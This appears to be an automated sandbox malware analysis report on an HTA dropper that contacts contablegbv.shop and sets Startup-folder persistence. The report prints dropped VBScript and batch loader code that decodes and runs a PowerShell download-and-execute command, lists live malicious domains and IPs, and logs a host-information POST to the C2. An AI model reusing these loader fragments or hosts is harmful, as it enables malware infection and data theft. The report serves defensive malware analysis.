https://contablegbv.shop/ZRALJZLWYNP/PNQRJTRMIBOS	mshta.exe, 00000000.00000003.152803023729.0000000002F83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.154021662792.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contablegbv.shop/ZRALJZLWYNP/PNQRJTRMIBfH	mshta.exe, 00000000.00000003.152803023729.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contablegbv.shop/ZRALJZLWYNP/PNQRJTRMIB.Z	mshta.exe, 00000000.00000003.152803023729.0000000002F94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contablegbv.shop/z	mshta.exe, 00000000.00000002.154021662792.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.152803023729.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microso	powershell.exe, 00000017.00000002.153223627515.0000000007781000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contablegbv.shop/ZRALJZLWYNP/PNQRJTRMIBH	mshta.exe, 00000000.00000002.154030697180.0000000006EF5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contablegbv.shop/ZRALJZLWYNP/PNQRJTRMIBq?	mshta.exe, 00000000.00000002.154029716435.0000000006DE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000017.00000002.153216829786.0000000004FC8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.quovadis.bm0	mshta.exe, 00000000.00000002.154029716435.0000000006DE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.153213657071.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	mshta.exe, 00000000.00000002.154029716435.0000000006DE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.153213657071.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contablegbv.shop/ZRALJZLWYNP/PNQRJTRMIB9Z	mshta.exe, 00000000.00000003.152803023729.0000000002F94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.154021662792.0000000002F94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000017.00000002.153216829786.0000000004E71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contablegbv.shop/	mshta.exe, 00000000.00000002.154021662792.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.152803023729.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lBWr	powershell.exe, 00000017.00000002.153216829786.0000000004E71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contablegbv.shop/ZRALJZLWYNP/PNQRJTRMIB/S	mshta.exe, 00000000.00000003.152803023729.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contablegbv.shop/B	mshta.exe, 00000000.00000002.154021662792.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.152803023729.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contablegbv.shop/ZRALJZLWYNP/PNQRJTRMIBqS	mshta.exe, 00000000.00000002.154021662792.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.152803556209.0000000002F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
93.127.200.211	contablefea.shop	Germany		62255	ASMUNDA-ASSC	true
159.100.18.13	contablegbv.shop	Germany		44066	DE-FIRSTCOLOwwwfirst-colonetDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573649
Start date and time:	2024-12-12 12:53:51 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	copia111224mp.hta
Detection:	MAL
Classification:	mal100.rans.expl.evad.winHTA@49/116@3/2
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 64.233.176.95, 64.233.177.95, 74.125.138.95, 142.250.105.95, 64.233.185.95, 172.217.215.95, 172.253.124.95, 74.125.21.95, 108.177.122.95, 173.194.219.95, 20.42.65.92, 52.113.194.132, 52.111.227.14, 20.42.73.31, 40.126.29.12
Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, onedscolprdeus21.eastus.cloudapp.azure.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, s-0005.s-msedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, nexusrules.officeapps.live.com, firebasestorage.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: copia111224mp.hta

Simulations

Behavior and APIs

Time	Type	Description
06:56:00	API Interceptor	894x Sleep call for process: powershell.exe modified
06:56:40	API Interceptor	2x Sleep call for process: WerFault.exe modified
06:57:22	API Interceptor	2x Sleep call for process: _nczuwk7_H.exe modified
12:56:05	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zayqgx5_K.lnk
12:56:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zayqgx5_KAA.lnk
12:56:22	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zayqgx5_KAT.lnk
12:56:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zayqgx5_KEX.lnk
12:56:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zayqgx5_Ky.lnk
12:56:51	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_nczuwk7_H.lnk
12:56:59	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_nczuwk7_HAA.lnk
12:57:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_nczuwk7_HAT.lnk
12:57:15	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_nczuwk7_HEX.lnk
12:57:23	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_nczuwk7_Hy.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
93.127.200.211	pw.ps1	Get hash	malicious	Unknown	Browse	93.127.200.211/a/08/150822/au/logs/index.php?CHLG

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DE-FIRSTCOLOwwwfirst-colonetDE	boatnet.m68k.elf	Get hash	malicious	Mirai	Browse	31.172.83.147
	boatnet.sh4.elf	Get hash	malicious	Mirai	Browse	31.172.83.147
	boatnet.ppc.elf	Get hash	malicious	Mirai	Browse	31.172.83.147
	nanophanotool.exe	Get hash	malicious	LummaC Stealer	Browse	159.100.18.192
	boatnet.x86.elf	Get hash	malicious	Mirai	Browse	31.172.83.147
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse	31.172.83.147
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	31.172.83.147
	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	31.172.83.147
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	31.172.83.147
	GRIM_STEAK.elf	Get hash	malicious	Sliver	Browse	159.100.17.221
ASMUNDA-ASSC	xd.spc.elf	Get hash	malicious	Mirai	Browse	93.127.162.213
	nullnet_load.ppc.elf	Get hash	malicious	Mirai	Browse	91.108.78.211
	Factura-2410-CFDI.bat	Get hash	malicious	Unknown	Browse	93.127.200.211
	JuyR4wj8av.exe	Get hash	malicious	Stealc, Vidar	Browse	93.127.208.30
	EL7ggW7AdA.exe	Get hash	malicious	Stealc, Vidar	Browse	93.127.208.30
	arm6.elf	Get hash	malicious	Unknown	Browse	93.127.202.25
	https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/	Get hash	malicious	Unknown	Browse	93.127.179.137
	https://nationalrecalls.com/outbound-scheduling-calls	Get hash	malicious	Unknown	Browse	93.127.179.248
	KKKK.hta	Get hash	malicious	Unknown	Browse	93.127.200.211
	pw.ps1	Get hash	malicious	Unknown	Browse	93.127.200.211

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip	Get hash	malicious	Unknown	Browse	93.127.200.211 159.100.18.13
	https://www.google.cv/url?duf=FbLLcAJXWZoeUZJIjST2&lfg=uVQGQao2QJuMH6TEkmpq&sa=t&fmc=XCKeeJBBTaVsgNFTQcDe&url=amp%2Fshairmylife.com%2Fkam%2FOATWMWQPC27P047EIPR32X/YWxpc29ub0B0aG9ydWsuY29t	Get hash	malicious	Unknown	Browse	93.127.200.211 159.100.18.13
	RQ--029.msi	Get hash	malicious	AteraAgent	Browse	93.127.200.211 159.100.18.13
	3d#U0438.hta	Get hash	malicious	Unknown	Browse	93.127.200.211 159.100.18.13
	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse	93.127.200.211 159.100.18.13
	RFQ-004282A.Teknolojileri A.S.exe	Get hash	malicious	AgentTesla	Browse	93.127.200.211 159.100.18.13
	Strait STS.vbs	Get hash	malicious	Remcos, GuLoader	Browse	93.127.200.211 159.100.18.13
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	93.127.200.211 159.100.18.13
	https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwE	Get hash	malicious	PureLog Stealer	Browse	93.127.200.211 159.100.18.13
37f463bf4616ecd445d4a1937da06e19	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse	159.100.18.13
	Agreement for YouTube cooperation.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	159.100.18.13
	Strait STS.vbs	Get hash	malicious	Remcos, GuLoader	Browse	159.100.18.13
	c2.hta	Get hash	malicious	XWorm	Browse	159.100.18.13
	peks66Iy06.exe	Get hash	malicious	Unknown	Browse	159.100.18.13
	XXHYneydvF.exe	Get hash	malicious	Unknown	Browse	159.100.18.13
	nt11qTrX4f.exe	Get hash	malicious	Unknown	Browse	159.100.18.13
	otsIBG7J9b.exe	Get hash	malicious	Unknown	Browse	159.100.18.13
	XgijTrY6No.exe	Get hash	malicious	Unknown	Browse	159.100.18.13
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	159.100.18.13

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows \System32\fodhelper.exe	Factura-2410-CFDI.bat	Get hash	malicious	Unknown	Browse
	rPO767575.cmd	Get hash	malicious	DBatLoader	Browse
	KKKK.hta	Get hash	malicious	Unknown	Browse
	ZG7UaFRPVW.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	IN-34823_PO39276-pdf.vbe	Get hash	malicious	Remcos, DBatLoader	Browse
	7XU2cRFInT.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	megerosites.cmd	Get hash	malicious	DBatLoader, Lokibot	Browse
	Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Payroll for July.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	2nd_Quarter_Order_Sheet_xls_0000000000000000000.exe	Get hash	malicious	Remcos, DBatLoader	Browse
C:\_nczuwk7_H\MSVCR100.dll (copy)	https://cdn.microvu.com/downloads/InSpec_2.97.10.exe	Get hash	malicious	Unknown	Browse
	DHzscd9uqT.exe	Get hash	malicious	STRRAT	Browse
	AYoF5MX6wK.exe	Get hash	malicious	STRRAT	Browse
	Componente_Firma_3.0.14_x86_BUNDLE.exe	Get hash	malicious	STRRAT	Browse
	Factura-2410-CFDI.bat	Get hash	malicious	Unknown	Browse
	mXF65oa1GJ.exe	Get hash	malicious	Unknown	Browse
	mXF65oa1GJ.exe	Get hash	malicious	Unknown	Browse
	Confirm Me.exe	Get hash	malicious	STRRAT	Browse
	PInstaller.exe	Get hash	malicious	STRRAT	Browse
	123.sfx.exe	Get hash	malicious	STRRAT	Browse

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.025648579081564
Encrypted:	false
SSDEEP:	384:oRZUfW8IjBUWHI4InjNJiEDu76ffAIO8bIR:oRZUPIjBUWHI4InjNJJDu76ffAIO8bI
MD5:	158F11365140080687FC505034D6B23C
SHA1:	3BE665625480C45C479B28D20FCCA11E7B6BC62A
SHA-256:	10FFAA8B2256E47DB99977068A5514CC7D388BE44FD50EF77B5EEC86DEDB4CD3
SHA-512:	DC74FA39C6DB46A9C030921D96FB60A0F9F693308D393665954A77492D08465E9DBD8B7F3FDCC3C2A9F17427BDC6D3EE5CD1FEC526CACA5639599AD48741EAFE
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.4.7.8.1.9.7.9.2.9.8.2.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.4.7.8.1.9.8.3.3.5.9.8.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.7.c.1.d.8.3.-.c.4.b.4.-.4.8.9.5.-.b.d.e.0.-.d.7.7.8.2.6.2.4.8.1.e.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.5.8.d.a.6.6.-.5.a.3.4.-.4.2.8.5.-.a.f.d.6.-.e.4.f.9.c.f.8.d.3.6.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=._.n.c.z.u.w.k.7._.H.i.7...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.i.n.i.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.2.7.c.-.0.0.0.1.-.0.0.5.0.-.a.9.e.2.-.c.2.e.5.8.c.4.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.3.5.1.9.5.5.1.0.4.c.2.5.d.b.0.2.1.2.7.5.0.d.8.1.4.4.b.f.1.6.0.0.0.0.0.0.0.0.!.0.0.0.0.6.1.5.d.c.2.f.a.8.2.7.f.a.b.3.9.e.1.6.a.7.e.9.7.2.1.f.4.8.4.e.7.f.4.d.3.

Process:	C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	254900
Entropy (8bit):	4.245807430982155
Encrypted:	false
SSDEEP:	3072:Oe/glsGgDCmiGu23qoQ8rt0Fvle+ssbdwy:T5tCmi2aW+ssbdw
MD5:	68353EB53817840BED062BAA5F2417BF
SHA1:	0144DC28B3F06B3AD30017BF7FA927B27056FAEE
SHA-256:	44D5B5B2250B1C0B8C65A850D3D858D4DD2C82DF157F27A230E9B9FB71F56786
SHA-512:	82DF72B035A08B216A632BE145C984142E82FAE4F769F51CF6058694DD8FFA279DCFF7E8F0E5E1FA03A4D0F19465FD0571996462231C8DF3FA29B6E7AFDAEB20
Malicious:	false
Preview:	TH02...... ......L......SM01........PP...L..........IPM.TaskRequest.Decline........h.......................h.......9............H..h.......................h............."gS....H..h.... ..................h....0..................h.......................h..............NS.......h....H..................h....P..................0....\........D&.............l.................2h.... ..................kc.o...................!h...................... h......................#h....8.................$h............D........."h.............j........'h......................1h......................0h....................../h.... ...............H..h....0.................-h....@.................+h....D........"gS.................... ..............FS..............FIPM.TaskRequest.Decline.Form.d..Standard.PM.Task Decline.PM.IPM.Microsoft.FolderDesign.FormsDescription................F.k..........dl..1111110000000000.icrMicrosoft.isThis form is used to decline a task request.........kf...... ..........&.......

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	Unicode text, UTF-8 text, with very long lines (313), with CRLF line terminators
Category:	dropped
Size (bytes):	1850
Entropy (8bit):	5.230198205567046
Encrypted:	false
SSDEEP:	48:20IvoeMlizR3WzMNz7yFyZ0DdaVAHAiLv:20IAHewM9c9DdIWp
MD5:	EEFBB9E4A9FD600D019CAC1535868014
SHA1:	D24A2C0F2B6732BFE9DE1C48E4AE6E11242948AA
SHA-256:	9E06D175C76B3457BBA2B4FBD688EDCAB82A5A55CFF9BE746D8FEFBB0B637AB4
SHA-512:	22537357F3436CFB20C97F05CC86A6B563783416A808323D6228BC7EE1C16A47AC6EE311014CDB2435D3B60E110DCBD1FF3781AE590F25A175F8D941FEE84E72
Malicious:	false
Preview:	' Gera um nome aleat.rio..Dim nomePasta..nomePasta = "Wins32Update_" ....' Define o caminho da nova pasta..Dim caminhoPasta..caminhoPasta = "C:\" & nomePasta....' Cria a nova pasta..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")....If Not fso.FolderExists(caminhoPasta) Then.. fso.CreateFolder(caminhoPasta).... ' Cria o primeiro arquivo dentro da nova pasta.. Dim nomeArquivo1.. nomeArquivo1 = caminhoPasta & "\A".... Dim arquivo1.. Set arquivo1 = fso.CreateTextFile(nomeArquivo1, True).. .. ' Conte.do do primeiro arquivo.. Dim conteudo1.. conteudo1 = "@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28://@12@24@23@29@10@11@21@14@11@10@27.@28@17@24@25/@21@21@2@3@1@0/@10@29@3') \| @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1".... ' Escreve o conte.do no primeiro arquivo.. arquivo1.WriteLine conteudo1.. arquivo1.Clos

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	26328
Entropy (8bit):	5.049018369731122
Encrypted:	false
SSDEEP:	768:XtAHk6V3IpNBQkj2dYoeOdBWJFY4NKe1h4iUxgardFxYiqMfNZGth7tZ:XtAHk6V3CNBQkj2dYoeOdBWJFY4NKe17
MD5:	8A234757ED6430470005C843A75E0569
SHA1:	85E85EDD5474B27F3F142A81BFDE1912A19D27E1
SHA-256:	06EFF54471EB6E2B0DAAB1E2E3DFD021A316CF638C72D7F58838C01F59FC481D
SHA-512:	84FCE45D4DADFFBCCDE200F853306791AE47D0DD35CDB0F5871D4111508014B24432325D90741DF5267AA47B5343708637FBAED9029DC027D3F919712E794618
Malicious:	false
Preview:	PSMODULECACHE.'.....\|g.z......C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation..........=o.z..Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer............z..a...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DeliveryOptimization\DeliveryOptimization.psd1........Get-DeliveryOptimizationLog....&...Get-DOPercentageMaxForegroundBandwidth....&...Set-DOPercentageMaxBackgroundBandwidth........Set-DeliveryOptimizationStatus.... ...Delete-DeliveryOptimizationCache....&...Set-DOPercentageMaxForegroundBandwidth....#...Get-DeliveryOptimizationLogAnalysis........Get-DODownloadMode........Get-DOConfig.....

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Process:	C:\_nczuwk7_H\_nczuwk7_H.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	modified
Size (bytes):	440783
Entropy (8bit):	7.856887085584569
Encrypted:	false
SSDEEP:	6144:+uyXtpIetQwAhmSv3kMereWIGkoy3emGurG1zp3h/ULCJ5sIeLq1rKzn/SBbbe1o:StpIezYmSsMer+ev7zhxbwLiKznweRgh
MD5:	F3CC2335D196FFCB380D6B5E4106C014
SHA1:	2D608E36950AC42EF9B26C3A8DFB9EFE888F485E
SHA-256:	A1F96A842FE7D33C5DE576AAD148F9BE4A2EC00353B9379C3AB5B77BF739C6B0
SHA-512:	582DC81BCF558FFEE63EE5157F5821A8450A9AD4168C00893A780A7C64806F94EAD83990EB0EE368841B5BF056D1F9B85FA13C3721D971A3375DEE21740FBC2B
Malicious:	false
Preview:	PK...........YG.AN............files10.xlsx..Y.E!.C...-J..8.......T0r......G.....Xld..TM...gS.lJ..El-..A..S...f...O....._.-2.u1.x..0.(c...3...Q.N.T..t=.....;d.$.P.a...<\[...].O....Y...u.Pw.....RC..}-}...3%......v........v.y..8]Uu.,"..&:..n.E@.3..K....5q......HFy..K....b.WJvU..-....lK.t.%.!;T....%9..gR.`..I.....u....Q..<).%..X$......d..(y..SZI..&0.qF...9$.AM..8.\......v..N..9p....!..q.q...g. .,..O.r.....zM..8........@.=.f.[`...o.G>eF.p.]V..pL..".<....4a.V.>.{vFy....<....\WR..D.}.R..^.1..C.G....;.7..G.63....~..."/...W.Z..m.^._b5..m.J..i~3y..P.\|...G..&..)......T{..[.{Wq..h....'....sW.c.......g\+...Y..>X...S./.G...[i:.Xl...:..$....o.kTK...?....^...o....?PK...........Y................files11.xlsx..I.@!.D.......GT..A.7+..Py.S....[.......^"-.......7q.WB-.-ss....)...g....&U.g%.... }.....,.A.f.....X^.`..A.0.,..oD=(..............0...M....._1.W.......0.;.....<k]L=Tl..:.Zt..[u.l......d..N.S..0.... q.r.5z.U..K.7.L..[.YJ...Q.j.........:...v.}?!.*Z].z..

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	463
Entropy (8bit):	5.41522309529663
Encrypted:	false
SSDEEP:	6:/I1EGxA1EyHYuvQqWmGki2ZmPN+6LO5SfoY5URNQnF/FI7p3AroioxgGI7p1GI7b:/IUb4u4tmm2ZQN+6LO5Sfy8n6pArt7qm
MD5:	41EBA80CB324D07670A3B61881535430
SHA1:	748BA6F8572AFF7E8E443013C1F0B252E76A24C5
SHA-256:	83FA1393C1FACDD3CC103BE13F25A289EF56B94FD2D3D4CADB83461D76745188
SHA-512:	C7DA58A768C9E7DA2980BC23709BCB2A1BCAA4D50CC3E8894469F36FF0888341CE446F2C35950B5BB8FC06431279B9B58C53D01A90D524B126BE5C1E80E630B1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@Echo off..Setlocal EnableExtensions..Setlocal EnableDelayedExpansion..cd %SystemRoot%\System32..Set /P _ghqatk7_J=<"C:\Wins32Update_\A"..set chars=0123456789abcdefghijklmnopqrstuvwxyz..for /L %%N in (10 1 36) do (..for /F %%C in ("!chars:~%%N,1!") do (..set "_ghqatk7_J=!_ghqatk7_J:%%N=%%C!"..)..)..)..for /F %%F in ("!_ghqatk7_J!") do (..set "_ghqatk7_J=!_ghqatk7_J:@=!"..)..for /F %%F in ("!_ghqatk7_J!") do (..set "_ghqatk7_J=!_ghqatk7_J:"=!"..)..%_ghqatk7_J%

File type:	HTML document, Unicode text, UTF-8 text, with very long lines (24548)
Entropy (8bit):	4.269782315690365
TrID:	HyperText Markup Language (12001/1) 52.16% HyperText Markup Language (6006/1) 26.10% Synchronized Multimedia Integration Language (5002/2) 21.74%
File name:	copia111224mp.hta
File size:	24'719 bytes
MD5:	bb2a7b90e374742198a5c1e6abd6efa6
SHA1:	d26a90b5dad06d1a5fb5e5706fb502750f4fedf9
SHA256:	f178a97f40b1024df4065b028ca58705113b4b4b72566bc1f2d3cb5eb7eb779f
SHA512:	f4b52744e606d0beb00c71f402bc41e271e5460d995c1037661431739bdbd9632e3ead0397992979c74e6c7dda7b0f289c1d430d86988069372d62bdd8306629
SSDEEP:	384:120IC1+oNkCTU3wcohGIVp65w2OajgqLDluzEOjeCCpK29tS6F+UlC:1z51+UkCwk/6efajgqdEeTKu0A8
TLSH:	13B2F956A38901161AE3035BB90B55E3A6BDD430A34D5294E4EEC27C3ACA5ECC32F7E5
File Content Preview:	<html>.<head>..<script src="https://contablegbv.shop/ZRALJZLWYNP/PNQRJTRMIB"></script>..</head>....<body>.voice testify esc..ndaloabandon partner other plenty controversial potential body teaspoon picture activist personally leg problem wealthy solid sigh

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 12:55:57.735878944 CET	50603	53	192.168.11.20	1.1.1.1
Dec 12, 2024 12:55:58.010631084 CET	53	50603	1.1.1.1	192.168.11.20
Dec 12, 2024 12:56:01.810395002 CET	62780	53	192.168.11.20	1.1.1.1
Dec 12, 2024 12:56:01.979154110 CET	53	62780	1.1.1.1	192.168.11.20
Dec 12, 2024 12:56:15.765763998 CET	62004	53	192.168.11.20	1.1.1.1
Dec 12, 2024 12:56:15.933490992 CET	53	62004	1.1.1.1	192.168.11.20

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 12:56:03.631294966 CET	171	OUT	POST /ldht/index26.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 159.100.18.13 Content-Length: 94 Expect: 100-continue Connection: Keep-Alive
Dec 12, 2024 12:56:03.849378109 CET	25	IN	HTTP/1.1 100 Continue
Dec 12, 2024 12:56:03.852830887 CET	94	OUT	Data Raw: 41 54 3d 57 31 30 36 34 5f 30 33 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 20 20 33 Data Ascii: AT=computer Microsoft Windows 10 Pro Windows Defender English (United Kingdom) 32-Bit CPU
